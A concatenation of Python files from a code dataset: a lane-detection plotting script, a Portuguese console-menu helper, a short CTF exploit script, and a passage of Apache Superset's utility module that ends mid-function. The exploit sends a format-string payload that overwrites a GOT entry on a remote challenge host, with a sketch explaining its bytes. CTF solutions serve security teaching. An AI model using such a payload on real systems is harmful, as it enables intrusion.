ax2.set_title(image2_title, fontsize=10)
plt.subplots_adjust(left=0.05, right=0.95, top=0.95, bottom=0.5)
plt.show()
def render_original_plotted_warped_image(image1, image2,image2_title ="Processed Image"):
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(17, 9))
f.tight_layout()
ax1.imshow(image1,cmap='gray')
"""ax1.plot([695,1100],[450,700], color='r', linewidth="6")
ax1.plot([1100,225],[700,700], color='r', linewidth="6")
ax1.plot([225,600],[700,470], color='r', linewidth="6")
ax1.plot([600,695],[470,450], color='r', linewidth="6")"""
ax1.set_title("Original Image", fontsize=10)
ax2.imshow(image2,cmap='gray')
"""ax2.plot([900,900],[0,700], color='r', linewidth="6")
ax2.plot([900,255],[700,700], color='r', linewidth="6")
ax2.plot([255,255],[700,0], color='r', linewidth="6")
ax2.plot([255,900],[0,0], color='r', linewidth="6")"""
ax2.set_title(image2_title, fontsize=10)
plt.subplots_adjust(left=0.05, right=0.95, top=0.95, bottom=0.5)
plt.show()
image_path = './test_images/straight_lines1.jpg'
image = mpimg.imread(image_path)
combined_image= create_threshold_binary_image(image,3)
render_original_combined_transforms_image(image,combined_image,"Thresholded Binary Image")
"""
image_path = './test_images/test6.jpg'
image = mpimg.imread(image_path)
combined_image= create_threshold_binary_image(image,3)
warped_image= birds_eye_view(combined_image)
render_original_plotted_warped_image(combined_image,warped_image,"Birds Eye view Image")"""
avg_line_length: 39.44382 | max_line_length: 100 | alphanum_fraction: 0.683094
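birds_eye_view() above returns the inverse perspective matrix Minv alongside the warped image, so a detected lane can be projected back onto the camera view. A short sketch of that round trip, reusing the helpers defined in the script and the same test image path it loads:

```python
import cv2
import matplotlib.image as mpimg

image = mpimg.imread('./test_images/straight_lines1.jpg')
binary = create_threshold_binary_image(image)   # helper defined in the script above
warped, Minv = birds_eye_view(binary)           # top-down view plus inverse transform

# Project the warped result back into the original camera perspective using Minv.
unwarped = cv2.warpPerspective(warped, Minv,
                               (image.shape[1], image.shape[0]),
                               flags=cv2.INTER_NEAREST)
```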
hexsha: d7e137f11b2e3a56ffbc1e7e0a579c3543ded5a5 | size: 1,292 | ext: py | lang: Python
repo: dani-fn/Projetinhos_Python | path: projetinhos/ex115/interface/__init__.py | head_hexsha: 692ff0a7f57d8f8f2e28f7b2c38bb6401e013bdb | licenses: ["MIT"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
def linha(tam=48):
    """Return a divider line made of `tam` dashes."""
return '-' * tam
def titulo(msg):
    """Print `msg` centered between two divider lines."""
print(linha())
print(f'{msg}'.center(48))
print(linha())
def leiaop(msg, a, b):
    """Read an integer option in the range [a, b), re-prompting until the input is valid."""
    erro = '\033[31m ERRO! Digite uma opção válida!\033[m'  # "ERROR! Enter a valid option!"
while True:
try:
v = int(input(msg))
except (TypeError, ValueError):
print(erro)
continue
except KeyboardInterrupt:
print('\033[31;1mEntrada de dados interrompida pelo usuário\033[m')
exit()
else:
if a <= v < b:
return v
else:
print(erro)
def menu(lista):
    """Display a numbered menu for the items in `lista` and return the chosen option (1-based)."""
titulo('MENU PRINCIPAL')
c = 1
for item in lista:
print(f'\033[33m{c}\033[m - \033[34m{item}\033[m')
c += 1
print(linha())
return leiaop('\033[32m Sua opção: \033[m', 1, len(lista)+1)
def leiaint(prompt):
    """Read an integer, re-prompting until the input is valid."""
    erro = '\033[31m ERRO! Digite uma opção válida!\033[m'  # "ERROR! Enter a valid option!"
while True:
try:
v = int(input(prompt))
except (TypeError, ValueError):
print(erro)
continue
except KeyboardInterrupt:
print('\033[31;1mEntrada de dados interrompida pelo usuário\033[m')
exit()
else:
return v
avg_line_length: 24.846154 | max_line_length: 80 | alphanum_fraction: 0.496904
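A short usage sketch of the helpers above, assuming the module is importable as the `interface` package it lives in; the menu items and prompts below are illustrative only:

```python
from interface import menu, leiaint, titulo

# Render a numbered menu and dispatch on the returned 1-based option.
opcao = menu(['List registered people', 'Register a new person', 'Quit'])
if opcao == 2:
    titulo('NEW RECORD')
    idade = leiaint('Age: ')  # keeps prompting until a valid integer is typed
```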
hexsha: 5144ff2b68f65fe7bc34889af6238ac6e9095f20 | size: 303 | ext: py | lang: Python
repo: ZJGSIS/ZJGSUCTF-Challenges | path: 2019/pwn/Time/exp.py | head_hexsha: 460bfaa90f5d13a0958702fa4e479905713738bc | licenses: ["MIT"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: 1 (2021-11-20T04:13:07.000Z to 2021-11-20T04:13:07.000Z) | max_issues_count: null | max_forks_count: null
content:
from pwn import *
#context.log_level='debug'
got=0x000000000601028
#p=process("./main")
p=remote("10.21.13.190",2699)
#gdb.attach(p)
payload="%{}c%8$hn".format(0x2216).ljust(0x10,'\x00')+p64(got)
payload=payload[:-5]
log.info((payload))
log.info(len(payload))
p.sendafter(".\n",payload)
p.interactive()
avg_line_length: 23.307692 | max_line_length: 62 | alphanum_fraction: 0.70297
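The exploit above is a classic format-string write. A standalone Python 3 sketch of how its payload bytes are laid out (pure struct, no pwntools; the byte offsets are read directly from the exploit source):

```python
import struct

got = 0x601028  # GOT entry targeted by the exploit above

# "%8726c%8$hn": print 0x2216 (8726) characters, then write that count as a
# 2-byte value through the pointer found at the format string's 8th positional
# argument, which the exploit places at offset 0x10 of the buffer.
fmt = "%{}c%8$hn".format(0x2216).encode().ljust(0x10, b"\x00")
payload = (fmt + struct.pack("<Q", got))[:-5]  # drop the address's 5 trailing NUL bytes
print(payload.hex(), len(payload))
```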
hexsha: 9f30c64d91f5b7cd62e44cf005989a70748967c6 | size: 57,274 | ext: py | lang: Python
repo: mvbvieira/finance_pipeline | path: superset/superset/utils/core.py | head_hexsha: 48b085aeafda61c82f77de4ae67ceb02ac32f683 | licenses: ["Apache-2.0"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: 1 (2020-11-03T06:34:21.000Z to 2020-11-03T06:34:21.000Z) | max_issues_count: 57 (2020-04-20T17:41:41.000Z to 2022-03-16T21:38:05.000Z) | max_forks_count: 2 (2021-10-12T17:51:34.000Z to 2021-10-15T18:55:52.000Z)
content:
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utility functions used across Superset"""
# pylint: disable=too-many-lines
import collections
import decimal
import errno
import json
import logging
import os
import platform
import re
import signal
import smtplib
import tempfile
import threading
import traceback
import uuid
import zlib
from datetime import date, datetime, time, timedelta
from distutils.util import strtobool
from email.mime.application import MIMEApplication
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
from enum import Enum, IntEnum
from timeit import default_timer
from types import TracebackType
from typing import (
Any,
Callable,
cast,
Dict,
Iterable,
Iterator,
List,
NamedTuple,
Optional,
Sequence,
Set,
Tuple,
Type,
TYPE_CHECKING,
TypeVar,
Union,
)
from urllib.parse import unquote_plus
import bleach
import markdown as md
import numpy as np
import pandas as pd
import sqlalchemy as sa
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.backends.openssl.x509 import _Certificate
from flask import current_app, flash, g, Markup, render_template, request
from flask_appbuilder import SQLA
from flask_appbuilder.security.sqla.models import Role, User
from flask_babel import gettext as __
from flask_babel.speaklater import LazyString
from pandas.api.types import infer_dtype
from pandas.core.dtypes.common import is_numeric_dtype
from sqlalchemy import event, exc, select, Text
from sqlalchemy.dialects.mysql import MEDIUMTEXT
from sqlalchemy.engine import Connection, Engine
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.sql.elements import TextClause
from sqlalchemy.sql.type_api import Variant
from sqlalchemy.types import TEXT, TypeDecorator, TypeEngine
from typing_extensions import TypedDict, TypeGuard
import _thread # pylint: disable=C0411
from superset.constants import (
EXAMPLES_DB_UUID,
EXTRA_FORM_DATA_APPEND_KEYS,
EXTRA_FORM_DATA_OVERRIDE_EXTRA_KEYS,
EXTRA_FORM_DATA_OVERRIDE_REGULAR_MAPPINGS,
)
from superset.errors import ErrorLevel, SupersetErrorType
from superset.exceptions import (
CertificateException,
SupersetException,
SupersetTimeoutException,
)
from superset.typing import (
AdhocMetric,
AdhocMetricColumn,
FilterValues,
FlaskResponse,
FormData,
Metric,
)
from superset.utils.dates import datetime_to_epoch, EPOCH
from superset.utils.hashing import md5_sha_from_dict, md5_sha_from_str
try:
from pydruid.utils.having import Having
except ImportError:
pass
if TYPE_CHECKING:
from superset.connectors.base.models import BaseColumn, BaseDatasource
from superset.models.core import Database
logging.getLogger("MARKDOWN").setLevel(logging.INFO)
logger = logging.getLogger(__name__)
DTTM_ALIAS = "__timestamp"
NO_TIME_RANGE = "No filter"
TIME_COMPARISION = "__"
JS_MAX_INTEGER = 9007199254740991 # Largest int Java Script can handle 2^53-1
InputType = TypeVar("InputType")
BIND_PARAM_REGEX = TextClause._bind_params_regex # pylint: disable=protected-access
class LenientEnum(Enum):
"""Enums with a `get` method that convert a enum value to `Enum` if it is a
valid value."""
@classmethod
def get(cls, value: Any) -> Any:
try:
return super().__new__(cls, value)
except ValueError:
return None
class AdhocMetricExpressionType(str, Enum):
SIMPLE = "SIMPLE"
SQL = "SQL"
class AnnotationType(str, Enum):
FORMULA = "FORMULA"
INTERVAL = "INTERVAL"
EVENT = "EVENT"
TIME_SERIES = "TIME_SERIES"
class GenericDataType(IntEnum):
"""
Generic database column type that fits both frontend and backend.
"""
NUMERIC = 0
STRING = 1
TEMPORAL = 2
BOOLEAN = 3
# ARRAY = 4 # Mapping all the complex data types to STRING for now
# JSON = 5 # and leaving these as a reminder.
# MAP = 6
# ROW = 7
class ChartDataResultFormat(str, Enum):
"""
Chart data response format
"""
CSV = "csv"
JSON = "json"
class ChartDataResultType(str, Enum):
"""
Chart data response type
"""
COLUMNS = "columns"
FULL = "full"
QUERY = "query"
RESULTS = "results"
SAMPLES = "samples"
TIMEGRAINS = "timegrains"
POST_PROCESSED = "post_processed"
class DatasourceDict(TypedDict):
type: str
id: int
class AdhocFilterClause(TypedDict, total=False):
clause: str
expressionType: str
filterOptionName: Optional[str]
comparator: Optional[FilterValues]
operator: str
subject: str
isExtra: Optional[bool]
sqlExpression: Optional[str]
class QueryObjectFilterClause(TypedDict, total=False):
col: str
op: str # pylint: disable=invalid-name
val: Optional[FilterValues]
grain: Optional[str]
isExtra: Optional[bool]
class ExtraFiltersTimeColumnType(str, Enum):
GRANULARITY = "__granularity"
TIME_COL = "__time_col"
TIME_GRAIN = "__time_grain"
TIME_ORIGIN = "__time_origin"
TIME_RANGE = "__time_range"
class ExtraFiltersReasonType(str, Enum):
NO_TEMPORAL_COLUMN = "no_temporal_column"
COL_NOT_IN_DATASOURCE = "not_in_datasource"
NOT_DRUID_DATASOURCE = "not_druid_datasource"
class FilterOperator(str, Enum):
"""
Operators used filter controls
"""
EQUALS = "=="
NOT_EQUALS = "!="
GREATER_THAN = ">"
LESS_THAN = "<"
GREATER_THAN_OR_EQUALS = ">="
LESS_THAN_OR_EQUALS = "<="
LIKE = "LIKE"
ILIKE = "ILIKE"
IS_NULL = "IS NULL"
IS_NOT_NULL = "IS NOT NULL"
IN = "IN"
NOT_IN = "NOT IN"
REGEX = "REGEX"
IS_TRUE = "IS TRUE"
IS_FALSE = "IS FALSE"
class PostProcessingBoxplotWhiskerType(str, Enum):
"""
Calculate cell contribution to row/column total
"""
TUKEY = "tukey"
MINMAX = "min/max"
PERCENTILE = "percentile"
class PostProcessingContributionOrientation(str, Enum):
"""
Calculate cell contribution to row/column total
"""
ROW = "row"
COLUMN = "column"
class QueryMode(str, LenientEnum):
"""
Whether the query runs on aggregate or returns raw records
"""
RAW = "raw"
AGGREGATE = "aggregate"
class QuerySource(Enum):
"""
The source of a SQL query.
"""
CHART = 0
DASHBOARD = 1
SQL_LAB = 2
class QueryStatus(str, Enum):
"""Enum-type class for query statuses"""
STOPPED: str = "stopped"
FAILED: str = "failed"
PENDING: str = "pending"
RUNNING: str = "running"
SCHEDULED: str = "scheduled"
SUCCESS: str = "success"
FETCHING: str = "fetching"
TIMED_OUT: str = "timed_out"
class DashboardStatus(str, Enum):
"""Dashboard status used for frontend filters"""
PUBLISHED = "published"
DRAFT = "draft"
class ReservedUrlParameters(str, Enum):
"""
Reserved URL parameters that are used internally by Superset. These will not be
passed to chart queries, as they control the behavior of the UI.
"""
STANDALONE = "standalone"
EDIT_MODE = "edit"
@staticmethod
def is_standalone_mode() -> Optional[bool]:
standalone_param = request.args.get(ReservedUrlParameters.STANDALONE.value)
standalone: Optional[bool] = (
standalone_param and standalone_param != "false" and standalone_param != "0"
)
return standalone
class RowLevelSecurityFilterType(str, Enum):
REGULAR = "Regular"
BASE = "Base"
class TimeRangeEndpoint(str, Enum):
"""
The time range endpoint types which represent inclusive, exclusive, or unknown.
    Unknown represents endpoints which are ill-defined: though the interval may be
    [start, end], the filter may behave like (start, end] due to mixed data types and
    lexicographical ordering.
:see: https://github.com/apache/superset/issues/6360
"""
EXCLUSIVE = "exclusive"
INCLUSIVE = "inclusive"
UNKNOWN = "unknown"
class TemporalType(str, Enum):
"""
Supported temporal types
"""
DATE = "DATE"
DATETIME = "DATETIME"
SMALLDATETIME = "SMALLDATETIME"
TEXT = "TEXT"
TIME = "TIME"
TIMESTAMP = "TIMESTAMP"
class ColumnTypeSource(Enum):
GET_TABLE = 1
CURSOR_DESCRIPION = 2
class ColumnSpec(NamedTuple):
sqla_type: Union[TypeEngine, str]
generic_type: GenericDataType
is_dttm: bool
python_date_format: Optional[str] = None
try:
# Having might not have been imported.
class DimSelector(Having):
def __init__(self, **args: Any) -> None:
# Just a hack to prevent any exceptions
Having.__init__(self, type="equalTo", aggregation=None, value=None)
self.having = {
"having": {
"type": "dimSelector",
"dimension": args["dimension"],
"value": args["value"],
}
}
except NameError:
pass
def flasher(msg: str, severity: str = "message") -> None:
"""Flask's flash if available, logging call if not"""
try:
flash(msg, severity)
except RuntimeError:
if severity == "danger":
logger.error(msg, exc_info=True)
else:
logger.info(msg)
def parse_js_uri_path_item(
item: Optional[str], unquote: bool = True, eval_undefined: bool = False
) -> Optional[str]:
"""Parse a uri path item made with js.
:param item: a uri path component
:param unquote: Perform unquoting of string using urllib.parse.unquote_plus()
:param eval_undefined: When set to True and item is either 'null' or 'undefined',
assume item is undefined and return None.
:return: Either None, the original item or unquoted item
"""
item = None if eval_undefined and item in ("null", "undefined") else item
return unquote_plus(item) if unquote and item else item
def cast_to_num(value: Optional[Union[float, int, str]]) -> Optional[Union[float, int]]:
"""Casts a value to an int/float
>>> cast_to_num('1 ')
1.0
>>> cast_to_num(' 2')
2.0
>>> cast_to_num('5')
5
>>> cast_to_num('5.2')
5.2
>>> cast_to_num(10)
10
>>> cast_to_num(10.1)
10.1
>>> cast_to_num(None) is None
True
>>> cast_to_num('this is not a string') is None
True
:param value: value to be converted to numeric representation
:returns: value cast to `int` if value is all digits, `float` if `value` is
decimal value and `None`` if it can't be converted
"""
if value is None:
return None
if isinstance(value, (int, float)):
return value
if value.isdigit():
return int(value)
try:
return float(value)
except ValueError:
return None
def cast_to_boolean(value: Any) -> Optional[bool]:
"""Casts a value to an int/float
>>> cast_to_boolean(1)
True
>>> cast_to_boolean(0)
False
>>> cast_to_boolean(0.5)
True
>>> cast_to_boolean('true')
True
>>> cast_to_boolean('false')
False
>>> cast_to_boolean('False')
False
>>> cast_to_boolean(None)
:param value: value to be converted to boolean representation
    :returns: value cast to `bool`: the string 'true' and numbers other than 0 are
        converted to True. Returns `None` if value is `None`
"""
if value is None:
return None
if isinstance(value, (int, float)):
return value != 0
if isinstance(value, str):
return value.strip().lower() == "true"
return False
def list_minus(l: List[Any], minus: List[Any]) -> List[Any]:
"""Returns l without what is in minus
>>> list_minus([1, 2, 3], [2])
[1, 3]
"""
return [o for o in l if o not in minus]
class DashboardEncoder(json.JSONEncoder):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self.sort_keys = True
def default(self, o: Any) -> Union[Dict[Any, Any], str]:
if isinstance(o, uuid.UUID):
return str(o)
try:
vals = {k: v for k, v in o.__dict__.items() if k != "_sa_instance_state"}
return {"__{}__".format(o.__class__.__name__): vals}
except Exception: # pylint: disable=broad-except
if isinstance(o, datetime):
return {"__datetime__": o.replace(microsecond=0).isoformat()}
return json.JSONEncoder(sort_keys=True).default(o)
class JSONEncodedDict(TypeDecorator): # pylint: disable=abstract-method
"""Represents an immutable structure as a json-encoded string."""
impl = TEXT
def process_bind_param(
self, value: Optional[Dict[Any, Any]], dialect: str
) -> Optional[str]:
return json.dumps(value) if value is not None else None
def process_result_value(
self, value: Optional[str], dialect: str
) -> Optional[Dict[Any, Any]]:
return json.loads(value) if value is not None else None
def format_timedelta(time_delta: timedelta) -> str:
"""
Ensures negative time deltas are easily interpreted by humans
>>> td = timedelta(0) - timedelta(days=1, hours=5,minutes=6)
>>> str(td)
'-2 days, 18:54:00'
>>> format_timedelta(td)
'-1 day, 5:06:00'
"""
if time_delta < timedelta(0):
return "-" + str(abs(time_delta))
# Change this to format positive time deltas the way you want
return str(time_delta)
def base_json_conv(obj: Any,) -> Any: # pylint: disable=inconsistent-return-statements
if isinstance(obj, memoryview):
obj = obj.tobytes()
if isinstance(obj, np.int64):
return int(obj)
if isinstance(obj, np.bool_):
return bool(obj)
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, set):
return list(obj)
if isinstance(obj, decimal.Decimal):
return float(obj)
if isinstance(obj, uuid.UUID):
return str(obj)
if isinstance(obj, timedelta):
return format_timedelta(obj)
if isinstance(obj, bytes):
try:
return obj.decode("utf-8")
except Exception: # pylint: disable=broad-except
return "[bytes]"
if isinstance(obj, LazyString):
return str(obj)
def json_iso_dttm_ser(obj: Any, pessimistic: bool = False) -> str:
"""
json serializer that deals with dates
>>> dttm = datetime(1970, 1, 1)
>>> json.dumps({'dttm': dttm}, default=json_iso_dttm_ser)
'{"dttm": "1970-01-01T00:00:00"}'
"""
val = base_json_conv(obj)
if val is not None:
return val
if isinstance(obj, (datetime, date, time, pd.Timestamp)):
obj = obj.isoformat()
else:
if pessimistic:
return "Unserializable [{}]".format(type(obj))
raise TypeError("Unserializable object {} of type {}".format(obj, type(obj)))
return obj
def pessimistic_json_iso_dttm_ser(obj: Any) -> str:
"""Proxy to call json_iso_dttm_ser in a pessimistic way
If one of object is not serializable to json, it will still succeed"""
return json_iso_dttm_ser(obj, pessimistic=True)
def json_int_dttm_ser(obj: Any) -> float:
"""json serializer that deals with dates"""
val = base_json_conv(obj)
if val is not None:
return val
if isinstance(obj, (datetime, pd.Timestamp)):
obj = datetime_to_epoch(obj)
elif isinstance(obj, date):
obj = (obj - EPOCH.date()).total_seconds() * 1000
else:
raise TypeError("Unserializable object {} of type {}".format(obj, type(obj)))
return obj
def json_dumps_w_dates(payload: Dict[Any, Any]) -> str:
return json.dumps(payload, default=json_int_dttm_ser)
def error_msg_from_exception(ex: Exception) -> str:
"""Translate exception into error message
Database have different ways to handle exception. This function attempts
to make sense of the exception object and construct a human readable
sentence.
TODO(bkyryliuk): parse the Presto error message from the connection
created via create_engine.
engine = create_engine('presto://localhost:3506/silver') -
gives an e.message as the str(dict)
presto.connect('localhost', port=3506, catalog='silver') - as a dict.
The latter version is parsed correctly by this function.
"""
msg = ""
if hasattr(ex, "message"):
if isinstance(ex.message, dict): # type: ignore
msg = ex.message.get("message") # type: ignore
elif ex.message: # type: ignore
msg = ex.message # type: ignore
return msg or str(ex)
def markdown(raw: str, markup_wrap: Optional[bool] = False) -> str:
safe_markdown_tags = [
"h1",
"h2",
"h3",
"h4",
"h5",
"h6",
"b",
"i",
"strong",
"em",
"tt",
"p",
"br",
"span",
"div",
"blockquote",
"code",
"hr",
"ul",
"ol",
"li",
"dd",
"dt",
"img",
"a",
]
safe_markdown_attrs = {
"img": ["src", "alt", "title"],
"a": ["href", "alt", "title"],
}
safe = md.markdown(
raw or "",
extensions=[
"markdown.extensions.tables",
"markdown.extensions.fenced_code",
"markdown.extensions.codehilite",
],
)
safe = bleach.clean(safe, safe_markdown_tags, safe_markdown_attrs)
if markup_wrap:
safe = Markup(safe)
return safe
def readfile(file_path: str) -> Optional[str]:
with open(file_path) as f:
content = f.read()
return content
def generic_find_constraint_name(
table: str, columns: Set[str], referenced: str, database: SQLA
) -> Optional[str]:
"""Utility to find a constraint name in alembic migrations"""
tbl = sa.Table(
table, database.metadata, autoload=True, autoload_with=database.engine
)
for fk in tbl.foreign_key_constraints:
if fk.referred_table.name == referenced and set(fk.column_keys) == columns:
return fk.name
return None
def generic_find_fk_constraint_name(
table: str, columns: Set[str], referenced: str, insp: Inspector
) -> Optional[str]:
"""Utility to find a foreign-key constraint name in alembic migrations"""
for fk in insp.get_foreign_keys(table):
if (
fk["referred_table"] == referenced
and set(fk["referred_columns"]) == columns
):
return fk["name"]
return None
def generic_find_fk_constraint_names( # pylint: disable=invalid-name
table: str, columns: Set[str], referenced: str, insp: Inspector
) -> Set[str]:
"""Utility to find foreign-key constraint names in alembic migrations"""
names = set()
for fk in insp.get_foreign_keys(table):
if (
fk["referred_table"] == referenced
and set(fk["referred_columns"]) == columns
):
names.add(fk["name"])
return names
def generic_find_uq_constraint_name(
table: str, columns: Set[str], insp: Inspector
) -> Optional[str]:
"""Utility to find a unique constraint name in alembic migrations"""
for uq in insp.get_unique_constraints(table):
if columns == set(uq["column_names"]):
return uq["name"]
return None
def get_datasource_full_name(
database_name: str, datasource_name: str, schema: Optional[str] = None
) -> str:
if not schema:
return "[{}].[{}]".format(database_name, datasource_name)
return "[{}].[{}].[{}]".format(database_name, schema, datasource_name)
def validate_json(obj: Union[bytes, bytearray, str]) -> None:
if obj:
try:
json.loads(obj)
except Exception as ex:
logger.error("JSON is not valid %s", str(ex), exc_info=True)
raise SupersetException("JSON is not valid") from ex
class SigalrmTimeout:
"""
To be used in a ``with`` block and timeout its content.
"""
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
def handle_timeout( # pylint: disable=unused-argument
self, signum: int, frame: Any
) -> None:
logger.error("Process timed out", exc_info=True)
raise SupersetTimeoutException(
error_type=SupersetErrorType.BACKEND_TIMEOUT_ERROR,
message=self.error_message,
level=ErrorLevel.ERROR,
extra={"timeout": self.seconds},
)
def __enter__(self) -> None:
try:
if threading.current_thread() == threading.main_thread():
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
except ValueError as ex:
logger.warning("timeout can't be used in the current context")
logger.exception(ex)
def __exit__( # pylint: disable=redefined-outer-name,redefined-builtin
self, type: Any, value: Any, traceback: TracebackType
) -> None:
try:
signal.alarm(0)
except ValueError as ex:
logger.warning("timeout can't be used in the current context")
logger.exception(ex)
class TimerTimeout:
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
self.timer = threading.Timer(seconds, _thread.interrupt_main)
def __enter__(self) -> None:
self.timer.start()
def __exit__( # pylint: disable=redefined-outer-name,redefined-builtin
self, type: Any, value: Any, traceback: TracebackType
) -> None:
self.timer.cancel()
if type is KeyboardInterrupt: # raised by _thread.interrupt_main
raise SupersetTimeoutException(
error_type=SupersetErrorType.BACKEND_TIMEOUT_ERROR,
message=self.error_message,
level=ErrorLevel.ERROR,
extra={"timeout": self.seconds},
)
# Windows has no support for SIGALRM, so we use the timer based timeout
timeout: Union[Type[TimerTimeout], Type[SigalrmTimeout]] = (
TimerTimeout if platform.system() == "Windows" else SigalrmTimeout
)
def pessimistic_connection_handling(some_engine: Engine) -> None:
@event.listens_for(some_engine, "engine_connect")
def ping_connection(connection: Connection, branch: bool) -> None:
if branch:
# 'branch' refers to a sub-connection of a connection,
# we don't want to bother pinging on these.
return
# turn off 'close with result'. This flag is only used with
# 'connectionless' execution, otherwise will be False in any case
save_should_close_with_result = connection.should_close_with_result
connection.should_close_with_result = False
try:
# run a SELECT 1. use a core select() so that
# the SELECT of a scalar value without a table is
# appropriately formatted for the backend
connection.scalar(select([1]))
except exc.DBAPIError as err:
# catch SQLAlchemy's DBAPIError, which is a wrapper
# for the DBAPI's exception. It includes a .connection_invalidated
# attribute which specifies if this connection is a 'disconnect'
# condition, which is based on inspection of the original exception
# by the dialect in use.
if err.connection_invalidated:
# run the same SELECT again - the connection will re-validate
# itself and establish a new connection. The disconnect detection
# here also causes the whole connection pool to be invalidated
# so that all stale connections are discarded.
connection.scalar(select([1]))
else:
raise
finally:
# restore 'close with result'
connection.should_close_with_result = save_should_close_with_result
def notify_user_about_perm_udate( # pylint: disable=too-many-arguments
granter: User,
user: User,
role: Role,
datasource: "BaseDatasource",
tpl_name: str,
config: Dict[str, Any],
) -> None:
msg = render_template(
tpl_name, granter=granter, user=user, role=role, datasource=datasource
)
logger.info(msg)
subject = __(
"[Superset] Access to the datasource %(name)s was granted",
name=datasource.full_name,
)
send_email_smtp(
user.email,
subject,
msg,
config,
bcc=granter.email,
dryrun=not config["EMAIL_NOTIFICATIONS"],
)
def send_email_smtp( # pylint: disable=invalid-name,too-many-arguments,too-many-locals
to: str,
subject: str,
html_content: str,
config: Dict[str, Any],
files: Optional[List[str]] = None,
data: Optional[Dict[str, str]] = None,
images: Optional[Dict[str, bytes]] = None,
dryrun: bool = False,
cc: Optional[str] = None,
bcc: Optional[str] = None,
mime_subtype: str = "mixed",
) -> None:
"""
Send an email with html content, eg:
send_email_smtp(
        'test@example.com', 'foo', '<b>Foo</b> bar', ['/dev/null'], dryrun=True)
"""
smtp_mail_from = config["SMTP_MAIL_FROM"]
smtp_mail_to = get_email_address_list(to)
msg = MIMEMultipart(mime_subtype)
msg["Subject"] = subject
msg["From"] = smtp_mail_from
msg["To"] = ", ".join(smtp_mail_to)
msg.preamble = "This is a multi-part message in MIME format."
recipients = smtp_mail_to
if cc:
smtp_mail_cc = get_email_address_list(cc)
msg["CC"] = ", ".join(smtp_mail_cc)
recipients = recipients + smtp_mail_cc
if bcc:
# don't add bcc in header
smtp_mail_bcc = get_email_address_list(bcc)
recipients = recipients + smtp_mail_bcc
msg["Date"] = formatdate(localtime=True)
mime_text = MIMEText(html_content, "html")
msg.attach(mime_text)
# Attach files by reading them from disk
for fname in files or []:
basename = os.path.basename(fname)
with open(fname, "rb") as f:
msg.attach(
MIMEApplication(
f.read(),
Content_Disposition="attachment; filename='%s'" % basename,
Name=basename,
)
)
# Attach any files passed directly
for name, body in (data or {}).items():
msg.attach(
MIMEApplication(
body, Content_Disposition="attachment; filename='%s'" % name, Name=name
)
)
# Attach any inline images, which may be required for display in
# HTML content (inline)
for msgid, imgdata in (images or {}).items():
image = MIMEImage(imgdata)
image.add_header("Content-ID", "<%s>" % msgid)
image.add_header("Content-Disposition", "inline")
msg.attach(image)
send_mime_email(smtp_mail_from, recipients, msg, config, dryrun=dryrun)
def send_mime_email(
e_from: str,
e_to: List[str],
mime_msg: MIMEMultipart,
config: Dict[str, Any],
dryrun: bool = False,
) -> None:
smtp_host = config["SMTP_HOST"]
smtp_port = config["SMTP_PORT"]
smtp_user = config["SMTP_USER"]
smtp_password = config["SMTP_PASSWORD"]
smtp_starttls = config["SMTP_STARTTLS"]
smtp_ssl = config["SMTP_SSL"]
if not dryrun:
smtp = (
smtplib.SMTP_SSL(smtp_host, smtp_port)
if smtp_ssl
else smtplib.SMTP(smtp_host, smtp_port)
)
if smtp_starttls:
smtp.starttls()
if smtp_user and smtp_password:
smtp.login(smtp_user, smtp_password)
logger.debug("Sent an email to %s", str(e_to))
smtp.sendmail(e_from, e_to, mime_msg.as_string())
smtp.quit()
else:
logger.info("Dryrun enabled, email notification content is below:")
logger.info(mime_msg.as_string())
def get_email_address_list(address_string: str) -> List[str]:
address_string_list: List[str] = []
if isinstance(address_string, str):
address_string_list = re.split(r",|\s|;", address_string)
return [x.strip() for x in address_string_list if x.strip()]
def get_email_address_str(address_string: str) -> str:
address_list = get_email_address_list(address_string)
address_list_str = ", ".join(address_list)
return address_list_str
def choicify(values: Iterable[Any]) -> List[Tuple[Any, Any]]:
"""Takes an iterable and makes an iterable of tuples with it"""
return [(v, v) for v in values]
def zlib_compress(data: Union[bytes, str]) -> bytes:
"""
Compress things in a py2/3 safe fashion
>>> json_str = '{"test": 1}'
>>> blob = zlib_compress(json_str)
"""
if isinstance(data, str):
return zlib.compress(bytes(data, "utf-8"))
return zlib.compress(data)
def zlib_decompress(blob: bytes, decode: Optional[bool] = True) -> Union[bytes, str]:
"""
Decompress things to a string in a py2/3 safe fashion
>>> json_str = '{"test": 1}'
>>> blob = zlib_compress(json_str)
>>> got_str = zlib_decompress(blob)
>>> got_str == json_str
True
"""
if isinstance(blob, bytes):
decompressed = zlib.decompress(blob)
else:
decompressed = zlib.decompress(bytes(blob, "utf-8"))
return decompressed.decode("utf-8") if decode else decompressed
def simple_filter_to_adhoc(
filter_clause: QueryObjectFilterClause, clause: str = "where",
) -> AdhocFilterClause:
result: AdhocFilterClause = {
"clause": clause.upper(),
"expressionType": "SIMPLE",
"comparator": filter_clause.get("val"),
"operator": filter_clause["op"],
"subject": filter_clause["col"],
}
if filter_clause.get("isExtra"):
result["isExtra"] = True
result["filterOptionName"] = md5_sha_from_dict(cast(Dict[Any, Any], result))
return result
def form_data_to_adhoc(form_data: Dict[str, Any], clause: str) -> AdhocFilterClause:
if clause not in ("where", "having"):
